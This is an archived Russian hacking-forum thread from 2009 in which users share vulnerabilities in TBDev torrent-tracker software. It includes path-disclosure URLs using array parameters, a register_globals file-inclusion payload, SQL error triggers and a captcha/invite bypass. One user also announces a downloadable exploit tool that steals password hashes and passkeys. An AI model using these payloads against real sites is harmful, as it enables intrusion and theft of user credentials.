ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.09.2009, 13:32
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Собственно,понятия не имею было,или небыло,но когда рылся в коде дивжка,для самообразования,нашол:
PHP код:
http://target.com/rss.php?feed=dl&cat=31&passkey[]=
Раскрытие путей.
|
|
|

28.09.2009, 13:36
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
И еще,незнаю будет ли работать гдето еще,ибо нет желания тестировать,но трекеры в моей локальной сети точно подвержены:
PHP код:
http://good73.net/getrss.php
При нажатии сабмита имеем POST данные:
PHP код:
cat%5B%5D=22&cat%5B%5D=20&cat%5B%5D=12&feed=web&login=passkey
Так вот,если просто повторить запрос,использовав при этом urlencode()(как в примере),получим раскрытие путей:
PHP код:
Warning: implode() [function.implode]: Invalid arguments passed in /usr/local/www/target.com/getrss.php on line 56
|
|
|

28.09.2009, 13:42
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Извиняюсь что в несколько постов,просто в данный момент пишу с нетбука,который очень меня напрягает.
Все знают,про такую кнопку как "Спасибо",так вот,сабмитим ее,и имеем POST-данные вида:
Создаем в качестве ajax,массив,с темже именем,то есть:
PHP код:
torrentid=33042&ajax[]=yes
Меня выкидывало на ошибку MySQL.Незнаю,возможно есть шанс раскрутить в скулю,но я в этом не силен.Это я оставлю на ваш тест 
|
|
|

29.09.2009, 11:00
|
|
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме: 47299
Репутация:
18
|
|
Создаем в качестве ajax,массив,с темже именем,то есть:
$ajax = (string) $_POST["ajax"];
а ошибка ибо уникальные индексы
|
|
|

29.09.2009, 11:06
|
|
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме: 1284900
Репутация:
399
|
|
Сообщение от HAXTA4OK
по моему тут все равно есть баги
Но в паблик их врядли станут выкладывать 
|
|
|

29.09.2009, 11:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Ну лан спалю одын приват =) на те старые версии
куча LFI & RFI =) мб и не приват
к примеру файл recover.php
PHP код:
require "include/bittorrent.php";
dbconn();
if ($_SERVER["REQUEST_METHOD"] == "POST")
{
подгружает файлик bittorrent.php а в нем
PHP код:
if (empty($rootpath))
$rootpath = ROOT_PATH;
require_once($rootpath . 'include/core.php');
?>
если прочесть его, то по смыслу ,если $rootpath не пустой ,тогда такой $rootpath = ROOT_PATH; замены не будет; и значит - уязвим  надеюсь я правильно его прочел))
При REGISTER_globals = on и MQ= off
http://127.0.0.1/treker/recover.php?rootpath='%00
Warning: require_once(') [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\treker\include\bittorrent.php on line 57
файлы имеющие такую особенность :
faq.php
recover.php
bookmarks.php
rules.php
download.php
....по моему почти все =\
Раскрытие путей :
так как mysql_real_escape_string
PHP код:
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
captcha.php?imagehash[]=
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in C:\xampp\htdocs\treker\include\functions.php on line 462
гуглом поискал не нашел))
еще раскрытие путей
PHP код:
$pic = htmlspecialchars($_GET["pic"]);
stdhead("Просмотр картинки");
print("<h1>$pic</h1>\n");
print("<p align=center><img src=\"torrents/images/$pic\"></p>\n");
?>
viewimage.php?pic[]=
Последний раз редактировалось HAXTA4OK; 29.09.2009 в 13:44..
|
|
|

29.09.2009, 16:04
|
|
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме: 47299
Репутация:
18
|
|
для меня это как два года боян, два - я указываю что отключайте регистер глобалс, не отключили - их личные проблемы 
|
|
|

02.10.2009, 15:36
|
|
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме: 95382
Репутация:
29
|
|
 Что же подольем немного масла. Слоит v3.3.
На данный момент он умеет обходить: - Коды регистрации
- Запросы инвайтов
- Бан по IP
Совершает атаки через: - ./rss.php (слепая SQL, ибо запись файла не айс)
- ./requests.php
- ./takesignup.php
- ./check_signup.php
- ./viewoffers.php
- ./sendbonus.php
- ./bonuscode.php
- Форум
Также имеет 2 способа работы: - Multi mode - атака по всем файлам, в том числе авторигистрация.
- Login exploit mode - работает только с логином и пассом.
Добавлено и доработано: - Получение всех IP адресов сайта и подключение
- Если не верно указан хост то сплоит и не начнет работу.
- Получение: соли, пассхеша, пасскея и инфы привязан ли пасскей к IP
- Если в конце адреса трекера не был указан слеш, то теперь сплоит с ума не сходит
- Вывод каким методом сплоит будет атаковать (чисто для информации)
В данный релиз не вошло следующие веши и также были удалены - Генерация приятных уху никнеймов
- Удалена атака через rss.php - file record
В связи с тем что форум не захотел отобразить не маленький сплоит. Пришлось его загрузить на отдельный сервер. Взять его можете здесь
Если по каким то причинам данный скрипт у вас не запускается, виноваты вы. Он рабочий, проверялся на оригинальном TBDev 2.0.
Внимание: Данная программа выложена здесь для ознакомления.
Автор не несёт ответственности за негативные последствия, причинённые данной программой в результате правильного или неправильного её использования.
Также автор не несет ответственности за причерченный вред кому либо данной программой.
 Чтож, прикрываем оперативно дырки.
|
|
|

02.10.2009, 20:05
|
|
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме: 47299
Репутация:
18
|
|
sendbonus, bonuscode?????? WTF?
Как вы поясните собираетесь обходить $b = get_row_count("captcha", "WHERE imagehash = ".sqlesc($_POST["imagehash"])." AND imagestring = ".sqlesc($_POST["imagestring"]));?
Даже если оба 0000000 и 0 - строчек-то тоже 0!
|
|
|

02.10.2009, 23:14
|
|
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме: 95382
Репутация:
29
|
|
Сообщение от Yuna
sendbonus, bonuscode?????? WTF?
Как вы поясните собираетесь обходить $b = get_row_count("captcha", "WHERE imagehash = ".sqlesc($_POST["imagehash"])." AND imagestring = ".sqlesc($_POST["imagestring"]));?
Даже если оба 0000000 и 0 - строчек-то тоже 0!
Да. Если включен error_reporting. То вывалиться ошибка, по которой уже можно судить, тому ли равна данная позиция или нет.
Хм... ну у нас выходит запрос вида:
Код:
SELECT COUNT(*) FROM captcha WHERE imagehash = 'принятый_imagehash' AND imagestring = 0
 Чесно не вникал как MySQL обрабатывает данный запрос, но по моему он хватает только 1й параметр а т.к. второй 0 отбрасывает.
Кстати, бага такого же вида и на инвайтах. Есть ведь супер инвайт в 32 нуля...и работает ведь.
Последний раз редактировалось Rostov114; 02.10.2009 в 23:21..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|